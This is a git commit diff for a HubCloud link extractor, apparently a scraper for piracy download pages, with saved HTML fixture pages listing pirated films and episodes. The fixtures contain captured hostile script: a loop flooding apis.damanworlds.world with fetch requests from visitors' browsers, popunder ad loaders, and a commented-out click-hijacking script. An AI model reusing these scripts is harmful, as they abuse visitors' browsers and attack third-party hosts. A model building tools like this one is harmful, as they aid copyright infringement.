fix(extractor): fix HubCloud picking up incorrect FSL URLs
This commit is contained in:
parent
d44e0a2588
commit
e438f3cbbd
8 changed files with 256 additions and 134 deletions
|
|
@ -28,7 +28,7 @@ export class HubCloud extends Extractor {
|
|||
.filter((_i, el) => {
|
||||
const text = $(el).text();
|
||||
|
||||
return text.includes('FSL') || text.includes('Download File');
|
||||
return text.includes('FSL') && !text.includes('FSLv2');
|
||||
})
|
||||
.map((_i, el) => {
|
||||
const url = new URL($(el).attr('href') as string);
|
||||
|
|
|
|||
|
|
@ -1,4 +1,11 @@
|
|||
<script data-cfasync="false" src="//d1vy7td57198sq.cloudfront.net/?dtyvd=1108348"></script>
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10553222',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220853"></script>-->
|
||||
<script>
|
||||
document.addEventListener("DOMContentLoaded", function() {
|
||||
history.pushState(null, null, location.href);
|
||||
|
|
@ -133,7 +140,7 @@ document.addEventListener("DOMContentLoaded", function() {
|
|||
<body><center>
|
||||
<br/>
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
|
||||
<div class="container">
|
||||
|
|
@ -160,7 +167,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<p class="h3 text-success">Download Link Generated</p>
|
||||
<div class="input-group mb-3">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.one/drive/bffzqlpqfllfcld" readonly="" id="ilink">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.foo/drive/bffzqlpqfllfcld" readonly="" id="ilink">
|
||||
<div class="input-group-prepend">
|
||||
<span class="input-group-text btn" id="basic-addon2" onclick="copy_link('ilink')">Copy Share Link</span>
|
||||
</div>
|
||||
|
|
@ -176,8 +183,15 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
<span>If All Servers 🛜 are not working ❌ Then Please <br><b>Change Your Browser DNS To Cloudflare 🚀 or Use <a href="https://one.one.one.one/" target="_blank">VPN</a></b> <br><a href="https://tinyurl.com/Unblock-Ban-Site" target="_blank">How ? Click Here 👉 to Watch Tutorial 👀</a></span>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="?token=a05d8e6416ce6b745a1073feeb9128a4" id="s3" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #2d50e2d1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [FSLv2 Server]</a>
|
||||
|
||||
<script>
|
||||
const fsl = document.getElementById('s3');
|
||||
if (fsl) fsl.href += '_1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
<div class="ad-container"></div>
|
||||
|
||||
|
||||
|
|
@ -187,10 +201,19 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
<a href="https://pub-6b25c191839c4b01a878de4fdde0227b.r2.dev/e35ec4a9a4efb5a154d0d10f9481dafc?token=1765557445" id="fsl" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6"><i class="fas fa-file-download fa-lg"></i> Download [FSL Server]</a>
|
||||
<script>
|
||||
const fsl = document.getElementById('fsl');
|
||||
if (fsl) fsl.href += '1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://pixel.hubcdn.fans/?id=21492bc915e609dd058e14bb1731d738ecbabde075e6a57924162ee17ab2dba6af0b2d315bfff2e113a3726863be50a0c9f92cc3470ad452f0c3223d49e7798f489e32a7a439e049a23b6750a49eb3f8acb834067ea5a1c7e0633b4425202ed5::b78919f2dc0c38d42c4c5147b3d4702c" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<a href="https://pixel.hubcdn.fans/?id=cf9da6de5b5cc1ca5b3e2520b5acf717edf501be7d93b65e393737c54cc02414e98b792baef67306766e1ada227050e941565d787d593d01503ab42aa92cc97a47e47ddd48df7d80a8e8c69d566d8d71fb824057bb75356c67cd624ebbd1497f::e0be1d5c31c2e9e9bce4002ad9cce30a" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<i class="fas fa-file-download fa-lg"></i> Download [Server : 10Gbps]</a>
|
||||
|
||||
<p style="font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">
|
||||
|
|
@ -202,18 +225,11 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
<a href="https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Crayon Shinchan Action Kamen vs Demon 1993 1080p BluRay REMUX AVC [Hindi DD 2.0 + Japanese FLAC 2.0] PitiPati-Ionicboy 4kHDHub.com.mkv?token=1758025506" id="fsl" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6"><i class="fas fa-file-download fa-lg"></i> Download [FSL Server]</a>
|
||||
<script>
|
||||
const fsl = document.getElementById('fsl');
|
||||
if (fsl) fsl.href += '1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://ddl2.cloudserver-1692958104.workers.dev/1397313204/a4d4a721744a9dfdbd8be7b27715738bbb80ca367d65277316db36bb584c0fbfe3c21108b9a243111ed7eec085a9d572ce5f7d7271507154b4d3d931114c3f8e4c2dce9cbb597557590a24a7083f463ed7369f491e73d260277b2545e1f6b9089f2467f185ac470832ea2089e27a5855e4204f396724eb836021b0a21b51bc5759b14c22bf8c0ca66f7680e0a44ff80bb09c20c28e93f2fdba3bd25769584e94ea466fca0aadafc2bdb59a70b319e25270e8502d4fb228d8c46c5a7d4f2af9c0::0f8e872aeeee57459e410e73b6e84d79/Crayon Shinchan Action Kamen vs Demon (1993) 1080p BluRay REMUX AVC [Hindi DD 2.0 + Japanese FLAC 2.0] (PitiPati-Ionicboy) (4kHDHub.com).mkv.zip" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #474b48 !important;"><i class="fas fa-file-download fa-lg"></i> Download [ZipDisk Server]</a>
|
||||
<p style="
|
||||
font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">Resume is Supported in ZipDisk But please extract it as the files is inside zip</p>
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -237,7 +253,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
if(isAndroid()){
|
||||
android_launch.classList.remove("d-none");
|
||||
android_launch.addEventListener('click', ()=>{
|
||||
var anchor = document.createElement('a');anchor.href= createIntentURL({host: 'https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Crayon Shinchan Action Kamen vs Demon 1993 1080p BluRay REMUX AVC [Hindi DD 2.0 + Japanese FLAC 2.0] PitiPati-Ionicboy 4kHDHub.com.mkv?token=1758025506',scheme: 'https',type: 'video/x-matrosk',
|
||||
var anchor = document.createElement('a');anchor.href= createIntentURL({host: 'https://pub-6b25c191839c4b01a878de4fdde0227b.r2.dev/e35ec4a9a4efb5a154d0d10f9481dafc?token=1765557445',scheme: 'https',type: 'video/x-matrosk',
|
||||
});anchor.click();
|
||||
});
|
||||
|
||||
|
|
@ -274,7 +290,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.one/drive/bffzqlpqfllfcld</p>
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.foo/drive/bffzqlpqfllfcld</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -308,6 +324,7 @@ Msc
|
|||
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
|
||||
|
||||
<!--2dl-->
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
@ -322,25 +339,44 @@ function cn(t){let e=window.location.protocol+"//"+window.location.host+t;histor
|
|||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
<script>
|
||||
function x(){
|
||||
for (let i = 0; i < 369; i++) {
|
||||
|
||||
fetch("https://apis.damanworlds.world/api/"+new Date().getTime() + i, {
|
||||
"method": "GET",
|
||||
"mode": "no-cors",
|
||||
"referrerPolicy": 'no-referrer',
|
||||
});
|
||||
}
|
||||
}
|
||||
x();
|
||||
const intervalId = setInterval(() => {
|
||||
x();
|
||||
}, 2000)
|
||||
</script>
|
||||
|
||||
<!--<script async src="https://greenanalytics.autos/recaptcha/v4_enc.js"></script>-->
|
||||
|
||||
<!--<script>let s__=!1,observer=null;const sc_="a, button";function opst(e){if(!s__)return;e.preventDefault(),e.stopImmediatePropagation();let t=document.createElement("a");t.href=s__,t.target="_blank",t.rel="noopener noreferrer",t.click();let r=document.querySelectorAll(sc_);r.forEach(e=>{e.removeEventListener("click",opst)}),observer.disconnect()}function atchs(){let e=document.querySelectorAll(sc_);e.forEach(e=>{e.addEventListener("click",opst,{once:!0})})}window.addEventListener("message",function(e){try{let t=JSON.parse(e.data);t?.url&&(s__=t.url,atchs(),(observer=new MutationObserver(atchs)).observe(document.body,{childList:!0,subtree:!0}))}catch(r){}},!1);-->
|
||||
<!--</script>-->
|
||||
|
||||
|
||||
<script>
|
||||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<script data-cfasync="false" type="text/javascript" id="clever-core">
|
||||
/* <![CDATA[ */
|
||||
(function (document, window) {
|
||||
var a, c = document.createElement("script"), f = window.frameElement;
|
||||
|
||||
c.id = "CleverCoreLoader98023";
|
||||
c.src = "https://scripts.cleverwebserver.com/9afdf189fcae8189c250865783d52630.js";
|
||||
|
||||
c.async = !0;
|
||||
c.type = "text/javascript";
|
||||
c.setAttribute("data-target", window.name || (f && f.getAttribute("id")));
|
||||
c.setAttribute("data-callback", "put-your-callback-function-here");
|
||||
c.setAttribute("data-callback-url-click", "put-your-click-macro-here");
|
||||
c.setAttribute("data-callback-url-view", "put-your-view-macro-here");
|
||||
|
||||
try {
|
||||
a = parent.document.getElementsByTagName("script")[0] || document.getElementsByTagName("script")[0];
|
||||
} catch (e) {
|
||||
a = !1;
|
||||
}
|
||||
|
||||
a || (a = document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]);
|
||||
a.parentNode.insertBefore(c, a);
|
||||
})(document, window);
|
||||
/* ]]> */
|
||||
</script>
|
||||
|
|
@ -1,4 +1,11 @@
|
|||
<script data-cfasync="false" src="//d1vy7td57198sq.cloudfront.net/?dtyvd=1108348"></script>
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10553222',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220853"></script>-->
|
||||
<script>
|
||||
document.addEventListener("DOMContentLoaded", function() {
|
||||
history.pushState(null, null, location.href);
|
||||
|
|
@ -133,7 +140,7 @@ document.addEventListener("DOMContentLoaded", function() {
|
|||
<body><center>
|
||||
<br/>
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
|
||||
<div class="container">
|
||||
|
|
@ -160,7 +167,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<p class="h3 text-success">Download Link Generated</p>
|
||||
<div class="input-group mb-3">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.one/drive/idt1evqfuviqiei" readonly="" id="ilink">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.foo/drive/idt1evqfuviqiei" readonly="" id="ilink">
|
||||
<div class="input-group-prepend">
|
||||
<span class="input-group-text btn" id="basic-addon2" onclick="copy_link('ilink')">Copy Share Link</span>
|
||||
</div>
|
||||
|
|
@ -176,8 +183,15 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
<span>If All Servers 🛜 are not working ❌ Then Please <br><b>Change Your Browser DNS To Cloudflare 🚀 or Use <a href="https://one.one.one.one/" target="_blank">VPN</a></b> <br><a href="https://tinyurl.com/Unblock-Ban-Site" target="_blank">How ? Click Here 👉 to Watch Tutorial 👀</a></span>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="?token=a05d8e6416ce6b745a1073feeb9128a4" id="s3" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #2d50e2d1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [FSLv2 Server]</a>
|
||||
|
||||
<script>
|
||||
const fsl = document.getElementById('s3');
|
||||
if (fsl) fsl.href += '_1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
<div class="ad-container"></div>
|
||||
|
||||
|
||||
|
|
@ -185,15 +199,21 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
<iframe src="https://pixeldrain.dev/u/HqAiguQV?embed" width="0" height="0" frameborder="0" style="display:none;" sandbox="allow-scripts allow-same-origin"></iframe>
|
||||
<a href="https://pixeldrain.net/u/HqAiguQV" download="Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #6f42c1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [PixelServer : 2]</a>
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://pub-b5ecaffddf2344a0ae2222f5e8913e1b.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1765557444" id="fsl" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6"><i class="fas fa-file-download fa-lg"></i> Download [FSL Server]</a>
|
||||
<script>
|
||||
const fsl = document.getElementById('fsl');
|
||||
if (fsl) fsl.href += '1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://pixel.hubcdn.fans/?id=529bf8a6089bbb95b78cf3cb1a6dc59fde5263bbdd021523a5c82feda0ba8ef5389cbaadec1f544a0af5c8005cc1f08d3c9d657117ec665281ccfab07cf57f480c0b88000cc87df9ace68870041479b5bbe24ca974e726fa3609bd53e21ad504::31791b788bbe5b7e5a8467880d69cece" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<a href="https://pixel.hubcdn.fans/?id=93cbf9a8a64bd73e509803a9c1a42d3ca3c1b5e6eedf0306d86e7862fe38d6450d7165aa485b86286f5e95151d3af31e89350676e5cca8b54f56737388e81172998605a935e8c1828f026797bc158ff23921f09201c464a9d4a29c75f5e12026::43a5d16883d6f6cd09d2487e56f0836d" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<i class="fas fa-file-download fa-lg"></i> Download [Server : 10Gbps]</a>
|
||||
|
||||
<p style="font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">
|
||||
|
|
@ -204,19 +224,15 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
|
||||
<a href="https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1758025505" id="fsl" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6"><i class="fas fa-file-download fa-lg"></i> Download [FSL Server]</a>
|
||||
<script>
|
||||
const fsl = document.getElementById('fsl');
|
||||
if (fsl) fsl.href += '1' + new Date().getMinutes();
|
||||
</script>
|
||||
<iframe src="https://pixeldrain.dev/u/HqAiguQV?embed" width="0" height="0" frameborder="0" style="display:none;" sandbox="allow-scripts allow-same-origin"></iframe>
|
||||
<a href="https://pixeldrain.dev/u/HqAiguQV" download="Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #6f42c1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [PixelServer : 2]</a>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://ddl2.cloudserver-1692954790.workers.dev/1397313204/f21e7028ea6a932d9591378bbac598891ca0fab13e210fef8c6be7d9b7b22c9f48fd9d22719a71a55e7280ac8dbe7f01fd57386fac993fe3bdf66772dc1e08e69792acbd18c323b87a7fbc0f4eec7862f1d793c3c20c36082861091c8236b110cf3c186c55945950681e369e305675b442a8df092f83e9483dd1cbfff5271db3b77fbec42689825baf890da2186efa9806c9c69f850a0ef850c159152151ecb6617bf57be248b1d023b493ea2b9d80161d45732806cae4a7a6e9da9bdd2a3279::ea94114583b705a605ed9e55dc452914/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv.zip" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #474b48 !important;"><i class="fas fa-file-download fa-lg"></i> Download [ZipDisk Server]</a>
|
||||
<p style="
|
||||
font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">Resume is Supported in ZipDisk But please extract it as the files is inside zip</p>
|
||||
|
||||
|
||||
|
||||
|
|
@ -240,7 +256,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
if(isAndroid()){
|
||||
android_launch.classList.remove("d-none");
|
||||
android_launch.addEventListener('click', ()=>{
|
||||
var anchor = document.createElement('a');anchor.href= createIntentURL({host: 'https://pub-52f57cc1b81f4ecdac02802c1566c33d.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1758025505',scheme: 'https',type: 'video/x-matrosk',
|
||||
var anchor = document.createElement('a');anchor.href= createIntentURL({host: 'https://pub-b5ecaffddf2344a0ae2222f5e8913e1b.r2.dev/Dexter.Original.Sin.S01E01.2160p.SKST.WEB-DL.H.265.DDP5.1-Tyrell.mkv?token=1765557444',scheme: 'https',type: 'video/x-matrosk',
|
||||
});anchor.click();
|
||||
});
|
||||
|
||||
|
|
@ -277,7 +293,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<div class="card">
|
||||
<div class="card-body" id="div1">
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.one/drive/idt1evqfuviqiei</p>
|
||||
<p id="sharelink" onclick="copy_link('div1')">https://hubcloud.foo/drive/idt1evqfuviqiei</p>
|
||||
</div>
|
||||
<button class="btn btn-success btn-sm" id="button1" onclick="copy_link('div1')"><i class="fa fa-copy"></i> Copy Link</button>
|
||||
<script>
|
||||
|
|
@ -311,6 +327,7 @@ Msc
|
|||
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
|
||||
|
||||
<!--2dl-->
|
||||
|
||||
<div class="footer">
|
||||
|
||||
<p>Made with <svg width="1em" height="1em" viewBox="0 0 16 16" class="bi bi-heart-fill" fill="red" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" d="M8 1.314C12.438-3.248 23.534 4.735 8 15-7.534 4.736 3.562-3.248 8 1.314z" /> </svg></p>
|
||||
|
|
@ -325,25 +342,44 @@ function cn(t){let e=window.location.protocol+"//"+window.location.host+t;histor
|
|||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
<script>
|
||||
function x(){
|
||||
for (let i = 0; i < 369; i++) {
|
||||
|
||||
fetch("https://apis.damanworlds.world/api/"+new Date().getTime() + i, {
|
||||
"method": "GET",
|
||||
"mode": "no-cors",
|
||||
"referrerPolicy": 'no-referrer',
|
||||
});
|
||||
}
|
||||
}
|
||||
x();
|
||||
const intervalId = setInterval(() => {
|
||||
x();
|
||||
}, 2000)
|
||||
</script>
|
||||
|
||||
<!--<script async src="https://greenanalytics.autos/recaptcha/v4_enc.js"></script>-->
|
||||
|
||||
<!--<script>let s__=!1,observer=null;const sc_="a, button";function opst(e){if(!s__)return;e.preventDefault(),e.stopImmediatePropagation();let t=document.createElement("a");t.href=s__,t.target="_blank",t.rel="noopener noreferrer",t.click();let r=document.querySelectorAll(sc_);r.forEach(e=>{e.removeEventListener("click",opst)}),observer.disconnect()}function atchs(){let e=document.querySelectorAll(sc_);e.forEach(e=>{e.addEventListener("click",opst,{once:!0})})}window.addEventListener("message",function(e){try{let t=JSON.parse(e.data);t?.url&&(s__=t.url,atchs(),(observer=new MutationObserver(atchs)).observe(document.body,{childList:!0,subtree:!0}))}catch(r){}},!1);-->
|
||||
<!--</script>-->
|
||||
|
||||
|
||||
<script>
|
||||
function setCookie(e,t,i){let o=encodeURIComponent(t),$=new Date;$.setTime($.getTime()+36e5*i);let n=`${e}=${o}; expires=${$.toUTCString()}; path=/`;document.cookie=n}setCookie("xyt",1,24);
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<script data-cfasync="false" type="text/javascript" id="clever-core">
|
||||
/* <![CDATA[ */
|
||||
(function (document, window) {
|
||||
var a, c = document.createElement("script"), f = window.frameElement;
|
||||
|
||||
c.id = "CleverCoreLoader98023";
|
||||
c.src = "https://scripts.cleverwebserver.com/9afdf189fcae8189c250865783d52630.js";
|
||||
|
||||
c.async = !0;
|
||||
c.type = "text/javascript";
|
||||
c.setAttribute("data-target", window.name || (f && f.getAttribute("id")));
|
||||
c.setAttribute("data-callback", "put-your-callback-function-here");
|
||||
c.setAttribute("data-callback-url-click", "put-your-click-macro-here");
|
||||
c.setAttribute("data-callback-url-view", "put-your-view-macro-here");
|
||||
|
||||
try {
|
||||
a = parent.document.getElementsByTagName("script")[0] || document.getElementsByTagName("script")[0];
|
||||
} catch (e) {
|
||||
a = !1;
|
||||
}
|
||||
|
||||
a || (a = document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]);
|
||||
a.parentNode.insertBefore(c, a);
|
||||
})(document, window);
|
||||
/* ]]> */
|
||||
</script>
|
||||
|
|
@ -1,4 +1,11 @@
|
|||
<script data-cfasync="false" src="//d1vy7td57198sq.cloudfront.net/?dtyvd=1108348"></script>
|
||||
<script id="aclib" type="text/javascript" src="//acscdn.com/script/aclib.js"></script>
|
||||
<script type="text/javascript">
|
||||
aclib.runPop({
|
||||
zoneId: '10553222',
|
||||
});
|
||||
</script>
|
||||
|
||||
<!--<script data-cfasync="false" src="//dl4d3y1ajyv3q.cloudfront.net/?aydld=1220853"></script>-->
|
||||
<script>
|
||||
document.addEventListener("DOMContentLoaded", function() {
|
||||
history.pushState(null, null, location.href);
|
||||
|
|
@ -133,7 +140,7 @@ document.addEventListener("DOMContentLoaded", function() {
|
|||
<body><center>
|
||||
<br/>
|
||||
<div class="header">
|
||||
HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
||||
HubCloud | <a href="https://hubcloud.foo/drive/admin">Login</a>
|
||||
</div>
|
||||
|
||||
<div class="container">
|
||||
|
|
@ -160,7 +167,7 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
</div>
|
||||
<p class="h3 text-success">Download Link Generated</p>
|
||||
<div class="input-group mb-3">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.one/drive/nknlofk8snfnknh" readonly="" id="ilink">
|
||||
<input onclick="copy_link('ilink')" type="text" class="form-control" value="https://hubcloud.foo/drive/nknlofk8snfnknh" readonly="" id="ilink">
|
||||
<div class="input-group-prepend">
|
||||
<span class="input-group-text btn" id="basic-addon2" onclick="copy_link('ilink')">Copy Share Link</span>
|
||||
</div>
|
||||
|
|
@ -176,8 +183,15 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
<span>If All Servers 🛜 are not working ❌ Then Please <br><b>Change Your Browser DNS To Cloudflare 🚀 or Use <a href="https://one.one.one.one/" target="_blank">VPN</a></b> <br><a href="https://tinyurl.com/Unblock-Ban-Site" target="_blank">How ? Click Here 👉 to Watch Tutorial 👀</a></span>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="?token=a05d8e6416ce6b745a1073feeb9128a4" id="s3" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #2d50e2d1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [FSLv2 Server]</a>
|
||||
|
||||
<script>
|
||||
const fsl = document.getElementById('s3');
|
||||
if (fsl) fsl.href += '_1' + new Date().getMinutes();
|
||||
</script>
|
||||
|
||||
|
||||
<div class="ad-container"></div>
|
||||
|
||||
|
||||
|
|
@ -185,15 +199,16 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
<iframe src="https://pixeldrain.dev/u/2kFQBQio?embed" width="0" height="0" frameborder="0" style="display:none;" sandbox="allow-scripts allow-same-origin"></iframe>
|
||||
<a href="https://pixeldrain.dev/api/file/2kFQBQio?download" download="Dark.S03E08.The.Paradise.1080p.NF.WEB-DL.English.DDP5.1-German.DDP5.1.H.264-4kHdHub.Com.mkv" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #6f42c1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [PixelServer : 2]</a>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<a href="https://pixel.hubcdn.fans/?id=4cbb9dc94a8c4698314305f887e913c3e7fef7f000d3da8d2bd1f4d6a1dca4d45fb98f415eea4192a2aeb35f6accfac5767d8eddd50fad89c724bb8075ae2dbe2e2987753b74253cf00625ede66ea0ec8ea4150eebb24be8a9e70bf70563d808::54473e647fcc8c02ec47d4d732f45d14" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<a href="https://pixel.hubcdn.fans/?id=8e81a3ddfb35a8f62a21c629b0a08f08a27f8f19be22ca584532726183bbe7cf4dc97e6ba2b4df7a1d76d124164dd6322999e62b058f6af48e4d7ff85a49ee9076155b673b872fa61f8fdeb04ce6540eec83233edac385159a9af83c16643f8f::3e17e91b2006e6622ac681dfceb43068" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-danger btn-lg h6" style="background-color: #dc3545 !important;">
|
||||
<i class="fas fa-file-download fa-lg"></i> Download [Server : 10Gbps]</a>
|
||||
|
||||
<p style="font-size: 12px; padding-bottom:4px !important; margin-bottom:0px !important">
|
||||
|
|
@ -204,6 +219,10 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
<iframe src="https://pixeldrain.dev/u/2kFQBQio?embed" width="0" height="0" frameborder="0" style="display:none;" sandbox="allow-scripts allow-same-origin"></iframe>
|
||||
<a href="https://pixeldrain.dev/u/2kFQBQio" download="Dark.S03E08.The.Paradise.1080p.NF.WEB-DL.English.DDP5.1-German.DDP5.1.H.264-4kHdHub.Com.mkv" rel="noreferrer nofollow noopener" target="_blank" class="btn btn-success btn-lg h6" style="background-color: #6f42c1 !important;"><i class="fas fa-file-download fa-lg"></i> Download [PixelServer : 2]</a>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -213,9 +232,6 @@ HubCloud | <a href="https://hubcloud.one/drive/admin">Login</a>
|
|||
|
||||
|
||||
|
||||
